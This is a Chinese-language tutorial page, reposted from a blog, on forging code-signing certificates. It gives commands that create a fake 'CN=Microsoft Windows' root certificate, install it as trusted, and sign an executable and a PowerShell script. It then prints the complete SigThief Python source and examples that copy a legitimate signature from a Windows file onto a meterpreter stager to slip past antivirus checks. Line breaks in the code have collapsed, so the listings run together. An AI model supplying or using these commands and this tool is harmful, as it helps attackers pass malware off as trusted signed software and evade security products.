您当前的位置:首页 > IT编程 > python
| C语言 | Java | VB | VC | python | Android | TensorFlow | C++ | oracle | 学术与代码 | cnn卷积神经网络 | gnn | 图像修复 | Keras | 数据集 | Neo4j | 自然语言处理 | 深度学习 | 医学CAD | 医学影像 | 超参数 | pointnet | pytorch | 异常检测 | Transformers | 情感分类 | 知识图谱 |

自学教程:Python使用sigthief签发证书的实现步骤

51自学网 2021-10-30 22:27:01
  python
这篇教程Python使用sigthief签发证书的实现步骤写得很实用,希望能帮到您。

证书制作工具下载: https://github.com/3gstudent/signtools

制作并签发证书:

正常情况下,针对exe签发证书有如下几个步骤.

1.查询一个程序中存在的证书,可以使用下面三个命令。

c:/> signtools Get-AuthenticodeSignature C:/Windows/System32/ConsentUX.dllc:/> signtools signtool.exe verify /v C:/Windows/System32/ConsentUX.dllc:/> signtools sigcheck.exe -q C:/Windows/System32/ConsentUX.dll

2.使用makecert命令制作证书,sv-私钥文件名,ss-主题的证书存储名称,n-证书颁发对象,r-证书存储位置。

c:/> signtools makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cerc:/> signtools cert2spc Root.cer Root.spcc:/> signtools pvk2pfx -pvk Root.pvk -pi 1233 -spc Root.spc -pfx Root.pfx -f

3.注册证书与签发证书。

c:/> signtools certmgr.exe -add -c Root.cer -s -r localmachine rootc:/> signtools signtool sign /f Root.pfx /p 1233 lyshark.exe

而如果要给PowerShell脚本添加证书,则执行如下命令即可.

1.生成证书文件

c:/> makecert -n "CN=Microsoft Windows" -r -eku 1.3.6.1.5.5.7.3.3 -sv certtest.pvk certtest.cerc:/> cert2spc certtest.cer certtest.spcc:/> pvk2pfx -pvk certtest.pvk -pi 123123 -spc certtest.spc -pfx certtest.pfx -f

2.给powershell脚本签名

c:/> powershellc:/> $cert = Get-PfxCertificate certtest.pfxc:/> Set-AuthenticodeSignature -Filepath lyshark.ps1 -Cert $cert

伪造PE文件证书:

有些反病毒软件供应商优先考虑某些证书颁发机构而不检查签名是否真正有效,并且有一些只是检查以查看certTable是否填充了某些值。这个工具让你快速将从已签名的PE文件中删除签名并将其附加到另一个文件,修复证书表以对文件进行签名。

开源工具SigThief可用于伪造证书,将下方代码保存为sigthief.py即可:

import sysimport structimport shutilimport iofrom optparse import OptionParserdef gather_file_info_win(binary):        """        Borrowed from BDF...        I could just skip to certLOC... *shrug*        """        flItms = {}        binary = open(binary, 'rb')        binary.seek(int('3C', 16))        flItms['buffer'] = 0        flItms['JMPtoCodeAddress'] = 0        flItms['dis_frm_pehdrs_sectble'] = 248        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]        # Start of COFF        flItms['COFF_Start'] = flItms['pe_header_location'] + 4        binary.seek(flItms['COFF_Start'])        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]        binary.seek(flItms['COFF_Start'] + 2, 0)        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]        binary.seek(flItms['COFF_Start'] + 16, 0)        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]        #End of COFF        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20        #if flItms['SizeOfOptionalHeader']:            #Begin Standard Fields section of Optional Header        binary.seek(flItms['OptionalHeader_start'])        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]        flItms['SizeOfUninitializedData'] = struct.unpack("<I",                                                               binary.read(4))[0]        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]        if flItms['Magic'] != 0x20B:            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]        # End Standard Fields section of Optional Header        # Begin Windows-Specific Fields of Optional Header        if flItms['Magic'] == 0x20B:            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]        else:            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',                                                                   binary.read(2))[0]        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',                                                                   binary.read(2))[0]        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]        flItms['SizeOfImageLoc'] = binary.tell()        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]        if flItms['Magic'] == 0x20B:            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]        else:            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]        # End Windows-Specific Fields of Optional Header        # Begin Data Directories of Optional Header        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()        #ImportTable SIZE|LOC        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]        flItms['CertTableLOC'] = binary.tell()        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]        binary.close()        return flItmsdef copyCert(exe):    flItms = gather_file_info_win(exe)    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:        # not signed        print("Input file Not signed!")        sys.exit(-1)    with open(exe, 'rb') as f:        f.seek(flItms['CertLOC'], 0)        cert = f.read(flItms['CertSize'])    return certdef writeCert(cert, exe, output):    flItms = gather_file_info_win(exe)        if not output:         output = output = str(exe) + "_signed"    shutil.copy2(exe, output)        print("Output file: {0}".format(output))    with open(exe, 'rb') as g:        with open(output, 'wb') as f:            f.write(g.read())            f.seek(0)            f.seek(flItms['CertTableLOC'], 0)            f.write(struct.pack("<I", len(open(exe, 'rb').read())))            f.write(struct.pack("<I", len(cert)))            f.seek(0, io.SEEK_END)            f.write(cert)    print("Signature appended. /nFIN.")def outputCert(exe, output):    cert = copyCert(exe)    if not output:        output = str(exe) + "_sig"    print("Output file: {0}".format(output))    open(output, 'wb').write(cert)    print("Signature ripped. /nFIN.")def check_sig(exe):    flItms = gather_file_info_win(exe)     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:        # not signed        print("Inputfile Not signed!")    else:        print("Inputfile is signed!")def truncate(exe, output):    flItms = gather_file_info_win(exe)     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:        # not signed        print("Inputfile Not signed!")        sys.exit(-1)    else:        print( "Inputfile is signed!")    if not output:        output = str(exe) + "_nosig"    print("Output file: {0}".format(output))    shutil.copy2(exe, output)    with open(output, "r+b") as binary:        print('Overwriting certificate table pointer and truncating binary')        binary.seek(-flItms['CertSize'], io.SEEK_END)        binary.truncate()        binary.seek(flItms['CertTableLOC'], 0)        binary.write(b"/x00/x00/x00/x00/x00/x00/x00/x00")    print("Signature removed. /nFIN.")def signfile(exe, sigfile, output):    flItms = gather_file_info_win(exe)        cert = open(sigfile, 'rb').read()    if not output:         output = output = str(exe) + "_signed"    shutil.copy2(exe, output)        print("Output file: {0}".format(output))        with open(exe, 'rb') as g:        with open(output, 'wb') as f:            f.write(g.read())            f.seek(0)            f.seek(flItms['CertTableLOC'], 0)            f.write(struct.pack("<I", len(open(exe, 'rb').read())))            f.write(struct.pack("<I", len(cert)))            f.seek(0, io.SEEK_END)            f.write(cert)    print("Signature appended. /nFIN.")if __name__ == "__main__":    usage = 'usage: %prog [options]'    parser = OptionParser()    parser.add_option("-i", "--file", dest="inputfile",                   help="input file", metavar="FILE")    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',                  help='rip signature off inputfile')    parser.add_option('-a', '--add', dest='addsig', action='store_true',                  help='add signautre to targetfile')    parser.add_option('-o', '--output', dest='outputfile',                  help='output file')    parser.add_option('-s', '--sig', dest='sigfile',                  help='binary signature from disk')    parser.add_option('-t', '--target', dest='targetfile',                  help='file to append signature to')    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',                  help='file to check if signed; does not verify signature')    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',                  help='truncate signature (i.e. remove sig)')    (options, args) = parser.parse_args()        # rip signature    # inputfile and rip to outputfile    if options.inputfile and options.ripsig:        print("Ripping signature to file!")        outputCert(options.inputfile, options.outputfile)        sys.exit()        # copy from one to another    # inputfile and rip to targetfile to outputfile        if options.inputfile and options.targetfile:        cert = copyCert(options.inputfile)        writeCert(cert, options.targetfile, options.outputfile)        sys.exit()    # check signature    # inputfile     if options.inputfile and options.checksig:        check_sig(options.inputfile)         sys.exit()    # add sig to target file    if options.targetfile and options.sigfile:        signfile(options.targetfile, options.sigfile, options.outputfile)        sys.exit()            # truncate    if options.inputfile and options.truncate:        truncate(options.inputfile, options.outputfile)        sys.exit()    parser.print_help()    parser.error("You must do something!")

我们需要找一个带有证书的文件,然后通过使用sigthief.py完成证书的克隆。此处就拿系统中的ConsentUX.dll演示。

c:/> python sigthief.py -i ConsentUX.dll -t lyshark.exe -o check.exeOutput file: check.exeSignature appended.FIN.

也可以从二进制文件中获取签名并将其添加到另一个二进制文件中

$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe Output file: /tmp/msftesting_tcpview.exeSignature appended. FIN.

将签名保存到磁盘以供以后使用,提供了一个转存功能。

$ ./sigthief.py -i tcpview.exe -r                                                        Ripping signature to file!Output file: tcpview.exe_sigSignature ripped. FIN.```BASH使用翻录签名```BASH$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               Output file: x86_meterpreter_stager.exe_signedSignature appended. FIN.```BASH截断(删除)签名 这实际上有非常有趣的结果,可以帮助您找到重视代码功能签名的AV)```BASH$ ./sigthief.py -i tcpview.exe -T    Inputfile is signed!Output file: tcpview.exe_nosigOverwriting certificate table pointer and truncating binarySignature removed. FIN.

文章出处:https://www.cnblogs.com/lyshark

以上就是Python使用sigthief签发证书的实现步骤的详细内容,更多关于Python使用sigthief签发证书的资料请关注51zixue.net其它相关文章!


python 操作sqlite数据库的方法
python 对图片进行简单的处理
万事OK自学网:51自学网_软件自学网_CAD自学网自学excel、自学PS、自学CAD、自学C语言、自学css3实例,是一个通过网络自主学习工作技能的自学平台,网友喜欢的软件自学网站。